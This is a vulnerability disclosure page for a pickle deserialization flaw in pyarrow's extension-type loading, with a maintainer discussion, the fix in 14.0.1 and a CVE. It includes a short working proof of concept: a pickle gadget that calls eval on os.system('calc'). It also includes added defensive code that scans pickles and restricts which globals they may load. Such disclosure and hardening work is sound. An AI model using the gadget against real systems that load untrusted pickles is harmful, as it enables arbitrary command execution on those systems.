Apache arrow command execution vulnerability in apache/arrow

Valid

Reported on

Nov 2nd 2023


Apache arrow command execution vulnerability

Vulnerability information

Apache Arrow is a multi-language toolkit designed to accelerate data exchange and in-memory processing. It is a development platform for in-memory analytics and contains a range of technologies that enable large data systems to process and move data quickly. Project address: https://github.com/apache/arrow

When Apache Arrow loads (deserializes) an extension type, the transmitted content is not verified, which allows attackers to construct malicious content and achieve arbitrary command execution.

Environment construction

Python 3.8, Windows 11. Install PyArrow first:

    pip install pyarrow

The details of the vulnerability

When Apache Arrow loads an extension type, it was found that the transmitted content is not validated. This test was carried out on Windows 11: malicious data is constructed and, after it is loaded, arbitrary command execution is achieved and the calculator pops up.

Executing the script pops up the calculator.

POC:

    import pickle

    # Pickle gadget: on load, the unpickler calls eval() on the attacker's string.
    class A():
        def __reduce__(self):
            return eval, ("__import__('os').system('calc')",)

    # Write the malicious payload to disk as if it were extension-type metadata.
    x = [A()]
    f = open("evil.pkl", "wb")
    pickle.dump(x, f)
    f.close()

    # PyExtensionType passes the serialized bytes straight to pickle.loads.
    import pyarrow as pa
    with open("evil.pkl", "rb") as d:
        pa.PyExtensionType.__arrow_ext_deserialize__(None, d.read())
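The PoC works because the PyExtensionType deserializer handed the serialized metadata to pickle.loads, and pickle resolves and calls whatever global a __reduce__ gadget names. The example below is added here and is not code from the report or from the Arrow project; it uses only the Python standard library to show the two controls a consumer of pickle-based metadata can apply: a static scan of the opcode stream for imported globals (pickletools parses opcodes without executing anything) and an unpickler whose find_class only resolves an allow-list. The Gadget class, the SAFE_GLOBALS allow-list and the sample payloads are constructed for this example; the gadget uses a harmless expression in place of the PoC's os.system call. The fix shipped in 14.0.1 put the control inside pyarrow itself by no longer loading this extension type automatically; the code here is the same idea for any code that still has to accept pickle bytes.

```python
import io
import pickle
import pickletools


# Same gadget shape as the report's PoC: __reduce__ tells the unpickler to
# call eval(...) while loading. The expression is a constructed, harmless
# stand-in for the os.system call in the PoC; the mechanism is identical.
class Gadget:
    def __reduce__(self):
        return eval, ("2 + 2",)


def build_payload(protocol=pickle.DEFAULT_PROTOCOL):
    """Constructed sample: the bytes an attacker-controlled serializer would
    emit as 'extension metadata'. Protocol 3 encodes the import as a GLOBAL
    opcode, protocol 4+ as STACK_GLOBAL; the scanner below handles both."""
    return pickle.dumps([Gadget()], protocol=protocol)


def referenced_globals(data):
    """List every (module, name) the pickle would import, without executing it.
    pickletools.genops only decodes opcodes, so it is safe on hostile input."""
    found = []
    recent_strings = []  # strings pushed so far (approximates the operand stack)
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):      # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":        # protocol >= 4: module, name pushed as strings
            if len(recent_strings) < 2:
                # Memo references (BINGET) are not followed here: fail closed.
                found.append(("<unresolved>", "<unresolved>"))
            else:
                found.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


# Globals a metadata deserializer may legitimately need (constructed allow-list).
# Nothing here can run code; eval, os.system, subprocess etc. are absent.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("builtins", "bytearray"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside SAFE_GLOBALS, so a
    REDUCE on eval or os.system fails before the callable is ever obtained."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            "refusing to resolve global %s.%s from untrusted pickle" % (module, name))


def safe_loads(data):
    """Two layers: reject statically if any disallowed global is referenced,
    then load with the restricted unpickler as the runtime backstop."""
    bad = [g for g in referenced_globals(data) if g not in SAFE_GLOBALS]
    if bad:
        raise pickle.UnpicklingError("payload references disallowed globals: %r" % bad)
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    evil = build_payload()
    print("globals in hostile payload:", referenced_globals(evil))
    try:
        safe_loads(evil)
    except pickle.UnpicklingError as exc:
        print("blocked:", exc)
    benign = pickle.dumps({"extension": "uuid", "byte_width": 16})
    print("benign metadata loads as:", safe_loads(benign))
```

The static scan is the cheap first line: it can run in a gateway or ingestion job on files that will later be opened by pyarrow, and it never evaluates the payload. The restricted unpickler matters because a scanner approximates the stack; anything it cannot resolve is treated as disallowed, and find_class is the point where pickle actually asks for the callable, so denying it there stops the gadget regardless of how it was encoded.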

Impact

yes


We are processing your report and will contact the apache/arrow team within 24 hours. 4 months ago
We have contacted a member of the apache/arrow team and are waiting to hear back 4 months ago
apache/arrow maintainer has acknowledged this report 4 months ago
ASF (Maintainer), 4 months ago:
Thank you for responsibly disclosing this potential issue!

While indeed this PoC shows passing untrusted data to __arrow_ext_deserialize__ is dangerous, __arrow_ext_deserialize__ is not public API. In order to qualify as a vulnerability, you'll need to show a code path where untrusted data is passed to this function. Did you identify any such code paths?

ASF (Maintainer), 4 months ago:
We did find a potential issue in this area, and may issue a CVE. If we end up crediting you, how would you like to be credited?

heishou (Researcher), 3 months ago:
Dear researcher, I hope you can help me apply for a CVE number, and if possible I hope you can give me an appropriate reward to encourage me to continue security research. Li Jiakun-laoquanshi

ASF (Maintainer), 3 months ago:
We confirm this issue, and have fixed it in version 14.0.1. We have published CVE-2023-47248 for it and credited you according to your directions above. Thanks again for reporting this issue responsibly!

ASF Security Team modified the Severity from Critical (10) to High (7.5) 3 months ago
ASF Security Team modified the CWE from Improper Neutralization of Special Elements used in a Command ('Command Injection') to Insufficiently Protected Credentials 3 months ago
heishou (Researcher), 3 months ago:
Hello dear safety researcher, when can I claim my reward?

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
Ben Harvie validated this vulnerability 3 months ago
laoquanshi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
This vulnerability has now been published 3 months ago